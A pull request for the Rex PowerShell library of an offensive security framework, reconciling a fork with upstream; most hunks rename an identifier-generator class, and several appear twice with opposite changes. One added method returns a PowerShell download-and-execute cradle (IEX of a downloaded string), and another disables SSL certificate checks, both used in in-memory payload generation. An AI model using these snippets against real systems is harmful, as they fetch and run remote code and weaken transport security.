### PR TITLE
Import SVIT deltas to rex/powershell - 20160628

### DIFF
--- a/lib/rex/powershell/payload.rb
+++ b/lib/rex/powershell/payload.rb
@@ -1,5 +1,5 @@
 # -*- coding: binary -*-
-require 'rex/random_identifier'
+require 'rex/random_identifier_generator'
 
 module Rex
 module Powershell
@@ -13,7 +13,7 @@ module Payload
   end
 
   def self.to_win32pe_psh_net(template_path, code)
-    rig = Rex::RandomIdentifier::Generator.new()
+    rig = Rex::RandomIdentifierGenerator.new()
     rig.init_var(:var_code)
     rig.init_var(:var_kernel32)
     rig.init_var(:var_baseaddr)
@@ -40,7 +40,7 @@ module Payload
     hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
 
-    hash_sub[:shellcode] = Rex::Powershell.to_powershell(code, hash_sub[:var_code])
+    hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
 
     read_replace_script_template(template_path, "to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end
@@ -52,7 +52,7 @@ module Payload
   #
   def self.to_win32pe_psh_reflection(template_path, code)
     # Intialize rig and value names
-    rig = Rex::RandomIdentifier::Generator.new()
+    rig = Rex::RandomIdentifierGenerator.new()
     rig.init_var(:func_get_proc_address)
     rig.init_var(:func_get_delegate_type)
     rig.init_var(:var_code)

--- a/lib/rex/powershell/payload.rb
+++ b/lib/rex/powershell/payload.rb
@@ -13,7 +13,7 @@ module Payload
   end
 
   def self.to_win32pe_psh_net(template_path, code)
-    rig = Rex::RandomIdentifierGenerator.new()
+    rig = Rex::RandomIdentifier::Generator.new()
     rig.init_var(:var_code)
     rig.init_var(:var_kernel32)
     rig.init_var(:var_baseaddr)
@@ -40,7 +40,7 @@ module Payload
     hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
 
-    hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
+    hash_sub[:shellcode] = Rex::Powershell.to_powershell(code, hash_sub[:var_code])
 
     read_replace_script_template(template_path, "to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end
@@ -52,7 +52,7 @@ module Payload
   #
   def self.to_win32pe_psh_reflection(template_path, code)
     # Intialize rig and value names
-    rig = Rex::RandomIdentifierGenerator.new()
+    rig = Rex::RandomIdentifier::Generator.new()
     rig.init_var(:func_get_proc_address)
     rig.init_var(:func_get_delegate_type)
     rig.init_var(:var_code)

--- a/lib/rex/powershell/psh_methods.rb
+++ b/lib/rex/powershell/psh_methods.rb
@@ -70,7 +70,17 @@ module Powershell
     # @return [String] Powershell code to disable SSL verification
     #   checks.
     def self.ignore_ssl_certificate
-      '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
+      '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}'
+    end
+
+    #
+    # Download and execute string via HTTP
+    #
+    # @param url [String] string to download
+    #
+    # @return [String] PowerShell code to download and exec the url
+    def self.download_and_exec_string(url)
+      %Q^ IEX ((new-object net.webclient).downloadstring('#{url}'))^
     end
 
     #

--- a/lib/rex/powershell/script.rb
+++ b/lib/rex/powershell/script.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 
+require 'rex'
 require 'forwardable'
 
 module Rex
@@ -32,7 +33,7 @@ module Powershell
 
     def initialize(code)
       @code = ''
-      @rig = Rex::RandomIdentifier::Generator.new
+      @rig = Rex::RandomIdentifierGenerator.new
 
       begin
         # Open code file for reading

--- a/lib/rex/powershell/script.rb
+++ b/lib/rex/powershell/script.rb
@@ -33,7 +33,7 @@ module Powershell
 
     def initialize(code)
       @code = ''
-      @rig = Rex::RandomIdentifierGenerator.new
+      @rig = Rex::RandomIdentifier::Generator.new
 
       begin
         # Open code file for reading


### PR DESCRIPTION
With lib/rex/powershell being moved to a separate gem, differences
between r7 and svit versions of the namespace can be quickly and
easily reconciled to reduce portability issues downstream.

Added functionality includes a parameter to execute PSH in-place,
meaning without wrappers in a native or pass-through PowerShell
context (meterpreter plugin, other channels). Additional methods
pushed upstream include decompression and decoding methods for
PowerShell scripts built by Rex, which can be used for debugging or
defensive measures.

Testing:
  None so far, this commit is in preparation for merging upstream
changes to the lib/rex structure into the SVIT fork.

Notes:
  Consumers and developers should test all included functionality
as the SVIT fork has some differences from the official upstream
Framework, and may need to submit pull requests to other Rex gems
(such as Text) in order to retain consistency and functionality
with upstream.
